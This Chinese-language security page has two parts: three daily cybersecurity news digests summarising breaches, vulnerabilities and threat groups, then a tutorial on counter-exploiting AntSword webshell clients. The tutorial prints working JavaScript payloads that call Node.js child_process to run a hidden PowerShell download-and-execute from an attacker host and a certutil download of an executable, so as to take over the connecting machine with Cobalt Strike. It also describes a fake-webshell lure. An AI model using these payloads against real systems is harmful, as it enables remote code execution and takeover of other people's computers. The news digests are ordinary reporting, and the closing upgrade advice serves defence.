1、研究人员披露GXC Team团伙利用AI进行网络欺诈 https://www.resecurity.com/blog/article/cybercriminals-implemented-artificial-intelligence-ai-for-invoice-fraud 研究人员发现了一个名为“ GXC Team ”的网络犯罪派别，该派别专门制作用于网上银行盗窃、电子商务欺骗和互联网诈骗的工具。2023 年 11 月 11 日左右，该组织的领导者以别名“ googleXcoder ”运作，在暗网上发布了多项公告。除夕夜，该组织宣布大幅降价，为其在暗网上销售的产品提供高达 20% 的折扣。这些帖子介绍了一种新工具，该工具结合了人工智能 (A 2、研究人员发现宝马公司子域存在SAP重定向漏洞 https://securityaffairs.com/156843/reports/bmw-affected-by-redirect-vulnerability.html 研究人员发现两个 BMW 子域容易受到 SAP 重定向漏洞的影响。它们被用来访问宝马经销商的内部工作场所系统，并且可能对攻击者进行鱼叉式网络钓鱼活动或恶意软件分发有用。SAP 重定向漏洞是一个影响 SAP 产品（SAP NetWeaver 应用程序服务器 Java）的 Web 应用程序服务器的安全问题。这意味着任何人都可以通过添加如下字符串来使用这些子域伪造重定向链接：“sap/public/bc/icf/logoff? 3、Cross Switch遭遇数据泄露影包含360万条隐私记录 https://thecyberexpress.com/cross-switch-data-breach/ Cross Switch 是在线支付网关管理领域的领先公司，目前正在处理重大数据泄露的后果。据报道，Cross Switch 数据泄露事件是由一个名为 IntelBroker 的威胁行为者实施的，据称已泄露了 360 万用户的个人信息。这包括敏感详细信息，例如全名、电子邮件、电话号码、消息、物理位置、银行信息、不记名令牌、出生日期和用户名。由于泄露的数据包括大量的个人信息，这一事件对于受影响的用户来说尤其令人担忧。 4、研究人员发现3个针对Linux的恶意PyPI软件包 https://www.fortinet.com/blog/threat-research/malicious-pypi-packages-deploy-coinminer-on-linux-devices Python Package Index (PyPI) 开源存储库中发现了三个新的恶意软件包，它们能够在受影响的 Linux 设备上部署加密货币挖矿程序。这三个有害软件包分别名为 moduleseven、driftme 和 catme，在被删除之前的一个月内总共吸引了 431 次下载。这些软件包在初次使用时，会在 Linux 设备上部署 CoinMiner 可执行文件。该活动与之前的一次 5、Ivanti警告关键的EPM漏洞可导致攻击者劫持注册设备 https://www.bleepingcomputer.com/news/security/ivanti-warns-critical-epm-bug-lets-hackers-hijack-enrolled-devices/ Ivanti 修复了其端点管理软件 (EPM) 中的一个严重远程代码执行 (RCE) 漏洞，该漏洞可让未经身份验证的攻击者劫持注册设备或核心服务器。Ivanti EPM 可帮助管理运行各种平台（从 Windows 和 macOS 到 Chrome OS 和 IoT 操作系统）的客户端设备。该安全漏洞（追踪为CVE-2023-39366）影响所有受支持的 Ivanti 6、CISA警告Chrome和Excel解析库中存在被主动利用的漏洞 https://www.bleepingcomputer.com/news/security/cisa-warns-of-actively-exploited-bugs-in-chrome-and-excel-parsing-library/ 美国网络安全和基础设施安全局已在已知利用漏洞目录中添加了两个漏洞，一个是 Google Chrome 中最近修补的缺陷，另一个是影响开源 Perl 库的错误，该库用于读取名为 Spreadsheet:arseExcel 的 Excel 文件中的信息。美国网络防御机构已要求联邦机构在 1 月 23 日之前根据供应商指示缓解 CVE-2023-7024 和 7、Cisco ASA的远程命令注入漏洞在暗网以100万美元价格出售 https://thecyberexpress.com/cisco-remote-command-injection-vulnerability 据称，名为“xc7d2f4”的威胁参与者正在出售 Cisco ASA 的远程命令注入漏洞。威胁发起者声称该漏洞存在于所有 55XX 系列的思科自适应安全设备 (ASA) 上。远程命令注入是一种涉及未经授权执行操作系统命令的攻击方法。当应用程序不安全地处理不受信任的输入来构建操作系统命令时，就会发生这种情况，通常是由于数据清理不充分和/或外部程序调用不当造成的。自适应安全设备（或 ASA）结合了防火墙、防病毒、入侵防御和 VPN 功能。它提供主动威胁 8、贝鲁特国际机场遭受网络攻击 https://securityaffairs.com/157079/hacking/cyber-attack-hit-beirut-international-airport.html 威胁行为者袭击了黎巴嫩贝鲁特拉菲克·哈里里国际机场并破坏了航班信息显示系统（FIDS）。 9、Sea Turtle网络间谍活动针对荷兰 IT 和电信公司 https://thehackernews.com/2024/01/sea-turtle-cyber-espionage-campaign.html 荷兰的电信、媒体、互联网服务提供商 (ISP)、信息技术 (IT) 服务提供商和库尔德网站已成为土耳其关系威胁组织"Sea Turtle"发起的新网络间谍活动的一部分。 10、俄罗斯黑客摧毁了乌克兰最大电信运营商的系统 https://www.freebuf.com/news/388832.html 2023年12月，俄罗斯黑客攻破了乌克兰最大的电信服务提供商Kyivstar的系统，并清除了电信运营商核心网络上的所有系统。此次事件发生后，Kyivstar的移动和数据服务中断，导致其2500万移动和家庭互联网用户中的大多数失去了互联网连接。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、攻击者劫持Orange Spain的RIPE帐户造成BGP配置更改 https://www.bleepingcomputer.com/news/security/hacker-hijacks-orange-spain-ripe-account-to-cause-bgp-havoc/ Orange Spain 今天遭遇互联网中断，原因是一名黑客侵入了该公司的 RIPE 帐户，错误配置了 BGP 路由和 RPKI 配置。互联网上的流量路由由边界网关协议 (BGP) 处理，该协议允许组织将其 IP 地址与自治系统 (AS) 编号相关联，并将其通告给它们所连接的其他路由器（称为对等方）。这些 BGP 通告创建一个路由表，该路由表传播到互联网上的所有其他边缘路由器，从 2、LastPass通知用户更改为12个字符的主密码以提高安全性 https://blog.lastpass.com/2024/01/lastpass-is-making-account-updates-heres-why/ LastPass今天通知客户，他们现在需要使用至少 12 个字符的复杂主密码，以提高帐户的安全性。尽管 LastPass 自 2018 年以来一再表示 主密码要求为 12 个字符，但用户仍然可以使用较弱的密码。自 2023 年 4 月起，LastPass 开始对新帐户或密码重置强制执行 12 个字符的主密码要求，但旧帐户仍可以使用少于 12 个字符的密码。从本月开始，LastPass 对所有帐户强制执行 12 个字符的主密码要求。此外 3、HealthEC遭遇数据泄露影响了450万患者 https://www.healthec.com/cyber-incident/ HealthEC LLC 是一家健康管理解决方案提供商，遭遇了数据泄露，影响了通过该公司客户之一接受护理的近 450 万人。HealthEC 提供了一个人口健康管理 (PHM) 平台，医疗保健组织可以使用该平台进行数据集成、分析、护理协调、患者参与、合规性和报告。12 月 22 日，该公司披露，其在 2023 年 7 月 14 日至 23 日期间遭遇数据泄露，导致其部分系统遭到未经授权的访问。对该事件的调查于 2023 年 10 月 24 日结束，调查显示入侵者从托管以下数据类型的受破坏系统中窃取了文件：姓名、 4、谷歌在 2024年首次 Chrome 更新中修复了6个漏洞 https://www.securityweek.com/google-patches-six-vulnerabilities-with-first-chrome-update-of-2024/ 谷歌发布了 Chrome 120 更新，以解决六个漏洞，其中包括外部研究人员报告的四个漏洞。 5、UAC-0050使用新的网络钓鱼策略来分发 Remcos RAT https://thehackernews.com/2024/01/uac-0050-group-using-new-phishing.html 名为 UAC-0050 的威胁行为者正在利用网络钓鱼攻击来使用新策略分发 Remcos RAT，以逃避安全软件的检测。 6、ChatGPT模型名被恶意注册域名超65万个 https://www.chinaz.com/ainews/4634.shtml 近期网络安全研究发现，黑客大规模注册与ChatGPT相似的域名，通过模糊用户判断，滥用ChatGPT模型信誉，引发恶意下载和信息泄露。 7、尼康、索尼和佳能用相机数字签名对抗 AI 作假 https://asia.nikkei.com/Business/Technology/Nikon-Sony-and-Canon-fight-AI-fakes-with-new-camera-tech 尼康、索尼和佳能正在开发在相机拍摄的照片中嵌入数字签名的技术，以区分日益复杂的 AI 图片。防篡改数字签名将包括日期、时间、地点和摄影师等信息。 8、欧洲央行将对银行进行网络压力测试评估抵御攻击的能力 https://www.inforisktoday.com/european-central-bank-to-put-banks-through-cyber-stress-test-a-24012 欧洲央行将从本月开始对银行进行网络压力测试，以确定其抵御网络攻击的能力。该机构要求欧洲 109 家银行在 2024 年中期之前进行漏洞评估和事件响应评估。 9、俄罗斯黑客潜伏于乌克兰电信巨头Kyivstar长达数月 https://www.secrss.com/articles/62502 路透伦敦1月4日 -乌克兰网络间谍负责人告诉路透，俄罗斯黑客至少从去年5月起就侵入了乌克兰电信巨头Kyivstar的系统，发起了一次网络攻击，这应该成为对西方的“重大警告”。这次黑客攻击是自近两年前俄罗斯全面入侵以来最严重的一次黑客攻击，从12月12日起，乌克兰最大的电信运营商为约2400万用户提供的服务中断了数天。 10、全球1100万SSH服务器面临"TerrapinAttack"威胁 https://www.secrss.com/articles/62479 安全威胁监控平台Shadowserver最近的一份报告警告说，互联网上有近1100万台SSH服务器（由唯一的IP地址标识），很容易受到水龟攻击（TerrapinAttack），从而威胁到某些SSH连接的完整性。“水龟攻击”是德国波鸿鲁尔大学安全研究人员开发的新攻击技术，。利用了SSH传输层协议的弱点，并结合了OpenSSH十多年前引入的较新的加密算法和加密模式。后者已被广泛的SSH实现所采用，因此影响当前的大多数SSH实例。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、Steam放弃对Windows7和8.1的支持以提高安全性 https://help.steampowered.com/en/faqs/view/4784-4F2B-1321-800A 自 1 月 1 日起，Windows 7、Windows 8 和 Windows 8.1 不再支持 Steam，在此日期之后，这些操作系统上现有的 Steam 客户端安装将不再接收任何类型的更新，包括安全更新。该公司建议用户升级到更新的操作系统。该游戏公司去年警告称，Steam 客户端将在新年不受支持，并在游戏客户端顶部显示倒计时，显示距离游戏客户端将不再接收软件更新还有多少天。Steam 客户端现在显示还剩 0 天。Steam 支持将无法为用户提供与旧操作系统相关的 2、跨链平台Orbit Chain因安全漏洞损失8600万美元加密货币 https://www.bleepingcomputer.com/news/security/orbit-chain-loses-86-million-in-the-last-fintech-hack-of-2023/ Orbit Chain 经历了一次安全漏洞，导致加密货币损失 8600 万美元，特别是 Ether、Dai、Tether 和 USD Coin。Orbit Chain 是一个区块链平台，旨在充当多资产中心，支持各种区块链、去中心化应用程序 (DApp) 和服务之间的互操作性。该平台并不直接被投资者用来购买资产或服务，而更像是一个支持更广泛生态系统的区块链基础设施项目。由身份不 3、攻击者窃取伊朗23家领先保险公司上亿条记录 https://www.infostealers.com/article/mysterious-hacker-strikes-iran-with-major-cyberattacks-against-industry-leading-companies/ 研究人员报告称，12 月 20 日，一名名为“irleaks”的黑客宣布出售据称从伊朗 23 家领先保险公司窃取的超过 1.6 亿条记录。研究人员分析了样本数据并确认其似乎是真实的。目前尚不清楚黑客是如何同时针对如此多的保险公司的。12 月 30 日，irleaks 还声称入侵了伊朗最大的外卖平台 SnapFood，窃取了 3 TB 数据。 4、Google网上论坛将终止对Usenet的支持以打击垃圾邮件 https://www.bleepingcomputer.com/news/google/google-groups-is-ending-support-for-usenet-to-combat-spam/ 谷歌已正式宣布停止对其 Google Groups 平台上的 Usenet 群组的支持，此举部分归因于该平台与垃圾邮件内容的增多。即将发生的更改将于 2024 年 2 月 22 日生效，此后用户将无法再通过 Google 网上论坛发布、订阅或查看新的 Usenet 内容。但是，在此截止日期之前发布的历史 Usenet 内容仍可在平台上查看和搜索。这一变化主要是由于基于文本的 Usenet 5、Cactus勒索软件攻击了瑞典零售提供商COOP https://securityaffairs.com/156709/cyber-crime/cactus-ransomware-coop-sweden.html Cactus 勒索软件组织声称攻击了瑞典最大的零售和杂货提供商之一的 Coop。Coop是瑞典最大的零售和杂货供应商之一，在全国拥有约 800 家商店。这些商店由 29 个消费者协会的 350 万会员共同拥有。企业中创造的所有盈余都会返回给会员或重新投资于企业，从而形成循环。Cactus勒索软件组织声称已经入侵了 Coop，并威胁要披露大量个人信息，包括超过 21000 个目录。Cactus 勒索软件组织将 Coop 添加到其 T 6、2023 年出现 21 个新的 Mac 恶意软件家族 https://www.securityweek.com/21-new-mac-malware-families-emerged-in-2023/ 2023 年总共发现了 21 个针对 macOS 系统的新恶意软件家族，比 2022 年增加了 50%。 7、网络犯罪分子利用人工智能 (AI) 进行发票欺诈 https://securityaffairs.com/156863/cyber-crime/artificial-intelligence-tool-for-invoice-fraud.html Crooks 创建了一种新工具，该工具使用人工智能 (AI) 创建用于电汇欺诈和 BEC 的欺诈发票。 8、高通芯片漏洞可通过语音通话进行远程攻击 https://www.scmagazine.com/news/qualcomm-chip-vulnerability-enables-remote-attack-by-voice-call 高通公司宣布存在一个严重漏洞，该漏洞可能导致使用其芯片组的设备受到远程攻击。该漏洞编号为 CVE-2023-33025，涉及 VoLTE 通话期间的缓冲区溢出，允许攻击者远程执行代码。 9、《未成年人网络保护条例》2024年1月1日起施行 http://www.news.cn/politics/20240101/3a9b5ca671004d0d8af40e00378c8433/c.html 《未成年人网络保护条例》自2024年1月1日起正式施行，作为我国首部专门性的未成年人网络保护综合立法，这部条例的施行标志着我国未成年人网络保护法治建设进入新阶段。 10、中国抗量子密码战略与政策法律工作组成立 http://www.anquan419.com/knews/24/6497.html 据介绍，工作组将对抗量子密码技术、产业、业务的现状和相关国内外政策、法律法规进行研究，以公开或定向方式发表抗量子密码相关蓝皮书、要报、专题研究报告等成果，推动形成中国抗量子密码共识和行动方案。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

前言 中国蚁剑使用Electron构建客户端软件，Electron实现上用的是Node.js，并且Node.js能执行系统命令，故可以利用蚁剑的webshell页面嵌入js来直接执行命令，进而钓鱼来上线CS。（类似Goby，Goby也是使用Electron构建客户端软件） 关键实现 蚁剑在虚拟终端时，页面上出现http/https协议头时会发生转换（字体会变蓝，表示处于超链接的状态），并且这个链接点开时所打开的页面是以蚁剑内部的浏览器进行打开的（最新版本修复后使用用户自带的浏览器打开），因此这便是我们利用页面执行Node.js来上线CS的好机会！ 反制复现 环境准备： 想要执行系统命令需要借助页面的加载，此时可以制造假的webshell来故意让红队连接，进而一步步引导红队点击恶意链接调用node.js进行命令执行，上钩。 影响的版本：AntSword < =v2.1.14 AntSword下载：https://github.com/AntSwordProject/antSword/releases 开源假webshell：https://github.com/MD-SEC/Anti_AntSword 1、蓝队故意在服务器放置假的webshell进行钓鱼 达到真实的效果可以添加一些提示信息，让红队上钩 <body> AntSword password admin </body> </html> 红队需要让其点击的恶意链接（利用蚁剑自带的帮助文档效果最佳） 在钓鱼的帮助文档的开头插入恶意payload，这里利用powershell一句话上线 <script type="text/javascript"> require('child_process').exec('powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'http://192.168.108.150:8080/a\'))"',(error, stdout, stderr)=>{     alert(`stdout: ${stdout}`); }); </script> 或者下载文件方式上线CS </script> <script type="text/javascript">require('child_process').exec("certutil.exe -urlcache -split -f http://192.168.108.150/artifact.exe C:/artifact.exe && C:/Windows/System32/conhost.exe C:/artifact.exe");</script> 注：payload一定要放开头，放后面可能由于html过大导致命令执行失败 可以自行编写攻击者点击钓鱼链接时的话术 2、红队开始利用蚁剑进行连接 模拟红队的文件浏览页面 模拟红队的命令行操作回显 3、开始钓鱼引诱红队 当红队输入没有提前在webshell模拟的命令时，就会回显一开始我们设置的钓鱼话术，引导攻击者点击恶意链接 红队点击恶意链接，出现正常的帮助文档 将红队发送的木马样本放在与cve-2022-39197.py脚本同一路径下 帮助文档由蚁剑内部的浏览器进行解析，该蚁剑浏览器会调用我们钓鱼页面恶意的js进行命令执行，然后上线CS 修复建议 1、升级至 AntSword v2.1.15版本 2、加载链接时候禁止使用内部浏览器打开，使用用户系统的浏览器打开 最后 此蚁剑反制虽然是一个之前曝光的漏洞了，但是基数上还是会有人在使用着存在漏洞的蚁剑版本，对于红队来说能白嫖webshell还是很诱惑的，可玩性也很高。